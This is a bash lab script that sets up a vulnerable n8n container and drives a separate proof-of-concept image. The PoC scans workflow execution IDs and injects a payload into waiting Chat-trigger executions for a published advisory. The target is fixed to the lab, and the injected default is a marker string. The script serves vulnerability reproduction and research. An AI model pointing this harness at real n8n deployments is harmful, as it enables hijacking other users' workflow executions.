#!/usr/bin/env bash
# ──────────────────────────────────────────────────────────────────────────────
# exploit.sh — one-shot helper for GHSA-f77h-j2v7-g6mw
#
# Usage:
# ./exploit.sh setup # pull images, build PoC, start n8n target
# ./exploit.sh scan # scan exec IDs 1-200 with default payload
# ./exploit.sh scan 1 500 # scan a custom range
# ./exploit.sh attack <exec-id> # attack a specific execution ID
# ./exploit.sh attack <exec-id> "custom payload"
# ./exploit.sh logs # tail n8n target logs
# ./exploit.sh clean # stop & remove everything
# ──────────────────────────────────────────────────────────────────────────────
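set -euo pipefail  # abort on command errors, unset variables and failed pipeline stages

# shellcheck disable=SC2034
readonly TARGET_INTERNAL="http://n8n-vuln:5678"  # lab target URL handed to the poc container via --target
readonly TARGET_LOCAL="http://localhost:5678"  # URL printed for the operator to open in a browser
readonly DEFAULT_PAYLOAD="[CVE-2026-42228] hijacked by PoC"  # marker string passed via --inject when none is given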
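usage() {
  # Print the comment header at the top of this script as help text, then
  # exit with status 1.
  #
  # Only the leading run of '#' lines is printed (a shebang on line 1 is
  # skipped, one optional space after '#' is stripped), so comments added
  # further down the file never leak into the help output.
  #
  # awk replaces the earlier sed 's/^# \?//': '\?' is a GNU extension that
  # BSD/macOS sed does not treat as "optional", which left the '# ' prefix
  # in the help text on those systems.
  awk '
    NR == 1 && /^#!/ { next }
    /^#/             { sub(/^# ?/, ""); print; next }
                     { exit }
  ' "$0"
  exit 1
}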
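require() {
  # Abort the script with exit status 1 unless the command named in $1 can
  # be resolved by the shell.
  #
  # Arguments: $1 - command name to look up
  # Outputs:   an error line on stderr when the lookup fails
  #
  # 'command -v' also succeeds for shell functions and builtins, not only
  # for executables found on PATH.
  if ! command -v "$1" &>/dev/null; then
    # Diagnostics go to stderr so they are not mixed into captured stdout.
    printf "[!] '%s' not found in PATH\n" "$1" >&2
    exit 1
  fi
}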
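require docker  # every lab action below goes through the docker CLI
docker compose version &>/dev/null || {
  # 'command -v docker' does not prove the compose plugin is installed.
  echo "[!] 'docker compose' plugin not available" >&2
  exit 1
}

cmd="${1:-}"  # sub-command; an empty or unknown value falls through to usage

case "$cmd" in
  setup)
    # Bring up the lab: pull the target image, build the PoC image, start
    # the target and wait for its container health check.
    # NOTE(review): the published port for n8n-vuln is defined in the compose
    # file, which is not visible here. Confirm it binds to 127.0.0.1 only, so
    # the deliberately vulnerable instance is not reachable from the network.
    echo "[*] Pulling vulnerable n8n image (1.123.22) ..."
    docker compose pull n8n-vuln
    echo "[*] Building attacker image ..."
    docker compose build poc
    echo "[*] Starting vulnerable n8n target ..."
    docker compose up -d n8n-vuln
    echo ""
    echo "[*] Waiting for n8n to become healthy ..."
    # Compare the whole status word: a substring match on "healthy" would
    # also accept "unhealthy". The wait is bounded so a container that never
    # starts, or has no health check, cannot hang the script forever.
    waited=0
    max_wait=300
    until [[ "$(docker inspect --format='{{.State.Health.Status}}' n8n-vuln 2>/dev/null)" == "healthy" ]]; do
      if (( waited >= max_wait )); then
        echo ""
        echo "[!] n8n-vuln did not report healthy within ${max_wait}s; see: ./exploit.sh logs" >&2
        exit 1
      fi
      printf '.'
      sleep 2
      waited=$(( waited + 2 ))
    done
    echo ""
    echo "[+] n8n is up at $TARGET_LOCAL"
    echo ""
    echo " Next steps:"
    echo " 1. Open $TARGET_LOCAL and complete the setup wizard"
    echo " 2. Create a workflow with a Chat trigger node"
    echo " 3. Set the Chat trigger Auth = None and activate the workflow"
    echo " 4. Open the Chat and send a message to put the execution in 'waiting' state"
    echo " 5. Run: ./exploit.sh scan"
    ;;
  scan)
    # Optional $2/$3 override the default ID range 1-200.
    START="${2:-1}"
    END="${3:-200}"
    # The values are forwarded as CLI arguments to the poc container; accept
    # digits only so a stray word or a value starting with '-' is rejected
    # here instead of being handed to that tool's option parser.
    if ! [[ "$START" =~ ^[0-9]+$ && "$END" =~ ^[0-9]+$ ]]; then
      echo "[!] scan range must be non-negative integers: ./exploit.sh scan [start] [end]" >&2
      exit 1
    fi
    echo "[*] Scanning execution IDs $START → $END against $TARGET_INTERNAL"
    # The target is always the fixed lab URL in TARGET_INTERNAL; this script
    # offers no way to point the PoC at another host.
    docker compose run --rm poc \
      --target "$TARGET_INTERNAL" \
      --start-id "$START" \
      --end-id "$END" \
      --inject "$DEFAULT_PAYLOAD"
    ;;
  attack)
    # $2 (execution ID) is mandatory; $3 optionally replaces the default payload.
    EXEC_ID="${2:?'Usage: ./exploit.sh attack <exec-id> [payload]'}"
    PAYLOAD="${3:-$DEFAULT_PAYLOAD}"
    # Same digits-only rule as the scan range (scan enumerates integer IDs).
    if ! [[ "$EXEC_ID" =~ ^[0-9]+$ ]]; then
      echo "[!] exec-id must be a non-negative integer" >&2
      exit 1
    fi
    echo "[*] Attacking execution $EXEC_ID ..."
    docker compose run --rm poc \
      --target "$TARGET_INTERNAL" \
      --exec-id "$EXEC_ID" \
      --inject "$PAYLOAD"
    ;;
  logs)
    # Follow the target container's log output until interrupted.
    docker compose logs -f n8n-vuln
    ;;
  clean)
    echo "[*] Stopping and removing lab containers, network, and volumes ..."
    # -v also deletes the compose volumes, so data created in the lab
    # instance is discarded with it.
    docker compose down -v
    echo "[+] Done."
    ;;
  *)
    usage
    ;;
esac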